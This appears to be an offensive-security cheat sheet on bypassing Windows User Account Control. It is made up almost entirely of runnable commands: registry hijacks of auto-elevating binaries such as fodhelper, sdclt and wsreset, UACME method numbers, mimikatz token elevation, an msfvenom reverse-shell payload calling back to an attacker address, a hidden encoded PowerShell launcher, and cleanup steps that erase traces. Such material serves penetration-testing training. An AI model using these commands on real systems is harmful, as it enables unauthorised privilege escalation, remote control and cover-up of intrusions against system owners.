UAC Bypass
Sections UAC Bypass
When you have an Administrator account but only a medium-integrity shell. UAC bypass elevates without a prompt.
i. Where you stand
UAC only matters if you’re already in the local Administrators group. Confirm:
whoami /groups | findstr /i "S-1-5-32-544\|Administrators"
Check current integrity:
whoami /groups | findstr /i "Mandatory Label"
## "High Mandatory Level" = elevated, no bypass needed
## "Medium Mandatory Level" = needs UAC bypass
Check UAC config:
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA
Values:
EnableLUA=0-> UAC disabled entirely, no bypass needed, all admins run elevatedConsentPromptBehaviorAdmin=0-> auto-elevate for admins (silent), no bypass neededConsentPromptBehaviorAdmin=5-> default, prompt for non-Windows binariesConsentPromptBehaviorAdmin=2-> always prompt for credentials (strictest)
ii. The fundamental trick
Some Microsoft binaries are flagged to auto-elevate without prompting. If one of them reads a registry key you control (HKCU), and that key tells it what to execute, you get elevation for free.
Find auto-elevate binaries:
sigcheck.exe -m C:\Windows\System32\*.exe | findstr /i autoelevate
Or just use known-good targets below.
iii. Fodhelper bypass (Win10/11)
The most reliable bypass for years. Fodhelper.exe auto-elevates and reads a registry path that doesn’t exist by default in HKCU:
reg add "HKCU\Software\Classes\ms-settings\Shell\Open\command" /d "C:\Windows\Temp\sh.exe" /f
reg add "HKCU\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /f
fodhelper.exe
## sh.exe runs as elevated (high integrity)
## Clean up:
reg delete "HKCU\Software\Classes\ms-settings" /f
iv. ComputerDefaults bypass
Same mechanism, different auto-elevate binary:
reg add "HKCU\Software\Classes\ms-settings\Shell\Open\command" /d "C:\Windows\Temp\sh.exe" /f
reg add "HKCU\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /f
computerdefaults.exe
v. EventVwr bypass (classic)
reg add "HKCU\Software\Classes\mscfile\shell\open\command" /d "C:\Windows\Temp\sh.exe" /f
eventvwr.exe
reg delete "HKCU\Software\Classes\mscfile" /f
Patched on most modern Windows but worth trying on older boxes.
vi. SDCLT bypass (Win10)
Backup tool that auto-elevates:
reg add "HKCU\Software\Classes\Folder\shell\open\command" /d "C:\Windows\Temp\sh.exe" /f
reg add "HKCU\Software\Classes\Folder\shell\open\command" /v DelegateExecute /f
sdclt.exe /KickOffElev
vii. SLUI bypass
reg add "HKCU\Software\Classes\exefile\shell\open\command" /d "C:\Windows\Temp\sh.exe" /f
reg add "HKCU\Software\Classes\exefile\shell\open\command" /v DelegateExecute /f
slui.exe
viii. WSReset bypass
reg add "HKCU\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command" /d "C:\Windows\Temp\sh.exe" /f
reg add "HKCU\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command" /v DelegateExecute /f
wsreset.exe
ix. UACME framework
Akagi/UACME has 60+ bypass techniques numbered as methods. Drop the binary, pick a method:
Akagi64.exe 23 C:\Windows\Temp\sh.exe
Akagi64.exe 33 C:\Windows\Temp\sh.exe
Akagi64.exe 41 C:\Windows\Temp\sh.exe
Method numbers to try first (most reliable across versions):
- 23 -> fodhelper
- 33 -> sdclt
- 41 -> computerdefaults
- 56 -> wsreset
- 61 -> very modern, Win11
When one fails, try the next number, the framework is designed for this.
x. DLL hijack of auto-elevate
When the registry tricks are patched, side-load a DLL into an auto-elevate binary. Same mechanic as PrivEsc - DLL & Unquoted Paths but the target binary auto-elevates:
## Plant a malicious DLL where an auto-elevate exe loads it from a writable user dir
## Example targets: Microsoft.Office.* binaries, OneDriveSetup.exe
xi. Token impersonation when admin
Already admin in a medium shell? Steal a high-integrity token from a SYSTEM process you own:
mimikatz.exe
privilege::debug
token::elevate
Or with PowerShell + Sherlock/PowerUp’s Get-SystemTokens.
This is the “I’m admin but my shell is medium” case where you bypass UAC by stealing the elevated token of an existing process you own.
xii. Build the payload
For all the registry tricks above, you point at an executable. Make it a real callback, not just cmd:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.1 LPORT=4444 -f exe -o sh.exe
Or PowerShell oneliner in the registry value:
reg add "HKCU\Software\Classes\ms-settings\Shell\Open\command" /d "powershell.exe -nop -w hidden -enc <base64>" /f
xiii. UAC and PSRemoting
A subtle gotcha: WinRM / PSRemoting from a remote admin already gives you a high-integrity token (no UAC filter applied to remote logons by default). If you can pivot via WinRM, you skip UAC entirely:
evil-winrm -i target -u Administrator -p 'pass'
## You're already elevated, no UAC bypass needed
See Lateral Movement .
xiv. Tested-bypass matrix
| OS | Fodhelper | Computer-Defaults | SDClt | WSReset | UACME #61 |
|---|---|---|---|---|---|
| Win10 1809 | Yes | Yes | Yes | Yes | n/a |
| Win10 21H2 | Yes (variant) | Yes | Yes | Yes | n/a |
| Win11 21H2 | Yes (variant) | Patched | Yes | Yes | Yes |
| Win11 23H2 | Patched | Patched | Patched | Patched | Yes |
| Server 2019 | Yes | Yes | n/a | n/a | n/a |
| Server 2022 | Patched | Patched | n/a | n/a | n/a |
Always test multiple. The patched ones get unpatched in re-introductions, and OS builds vary.
xv. Cleanup
reg delete "HKCU\Software\Classes\ms-settings" /f 2>nul
reg delete "HKCU\Software\Classes\mscfile" /f 2>nul
reg delete "HKCU\Software\Classes\Folder" /f 2>nul
reg delete "HKCU\Software\Classes\exefile" /f 2>nul
reg delete "HKCU\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2" /f 2>nul
See Persistence & Cleanup for the full Windows cleanup pass.